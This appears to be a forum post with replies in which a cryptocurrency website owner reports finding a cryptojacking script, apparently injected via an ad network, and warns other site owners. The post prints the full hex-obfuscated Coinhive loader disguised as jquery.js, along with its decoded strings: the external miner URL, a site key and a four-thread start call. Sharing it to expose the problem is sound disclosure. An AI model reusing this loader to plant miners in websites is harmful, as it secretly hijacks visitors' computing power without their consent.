One of the side projects I run is a website about cryptocurrencies. I focus mainly on profiling the most prominent coins and offering objective information. It’s mostly a hobby, but I opted for monetizing it using niche ads so it can pay for itself.
A well-known crypto ad network contacted and offered me a decent deal. It was all going well until a few weeks ago. I had installed a browser extension called minerBlock just out of curiosity. I was surprised to learn that my own website was running a Coinhive script in the background.
I did notice a while back that my CPU usage would spike when I had my website open. I thought it was due to the several tabs I had running simultaneously and never made the connection to a possible mining script.
My website doesn’t run any external scripts except for the one that loaded the ads on my homepage.
Yet, I was infected with a sneaky Coinhive injection that disguised itself as a jquery.js file.
Here's the relevant code if anyone is interested:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];
function loadScript(_0xca68x2, _0xca68x3) {
var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
_0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
_0xca68x4[_0x7a2c[4]] = _0xca68x2;
_0xca68x4[_0x7a2c[5]] = _0xca68x3;
_0xca68x4[_0x7a2c[6]] = _0xca68x3;
document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
threads: 4
});
_0xca68x5[_0x7a2c[11]]()
});
If you decode var _0x7a2c using a service like Hexdecoder, you'll get this:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
If you don't know what Coinhive is, here's a good write up by @fiserman.
To be clear, I have nothing against Coinhive. However, I do have a problem if you're using it to mine cryptocurrencies on random people's computers without their consent.
I won’t disclose the ad network because I can’t effectively prove they did it. The sneaky bastards.
Nonetheless, if you run a website or even if you visit those websites very often, I encourage you to use a browser extension like the one I mentioned.
Be safe,
I have heard about people installing malicous scripts/viruses in ads that they then pay an ad network to (while unaware of the script or virus in the file) publish it on people's wbsites. If they can do it with viruses then they could probably do it with a coin miner script, so I guess there's always a small chance that the ad network didn't (knowingly) back stab you.
It could be like you described. It could even be someone from the network that did it without the organization's consent. I tried to audit the code, but it's a neverending cascade of scripts linked to scripts that are linked to scripts...
I guess I'll never really know.
Monero's price jump has really ruined a lot of things. There were some serious WordPress hacks that got publicized last month where people were stealing a ridiculous amount of hash rate. The whole CoinHive thing and these sorts of injections REALLY bug me because I work on laptops most of the time and am not of fan of my battery life disappearing.
It's crazy. They don't even try to make it subtle it seems. I'd open my task manager and the CPU usage would be all over the place. It took me a good half day to find and get rid of it.
WOW, we have to be super careful now a days!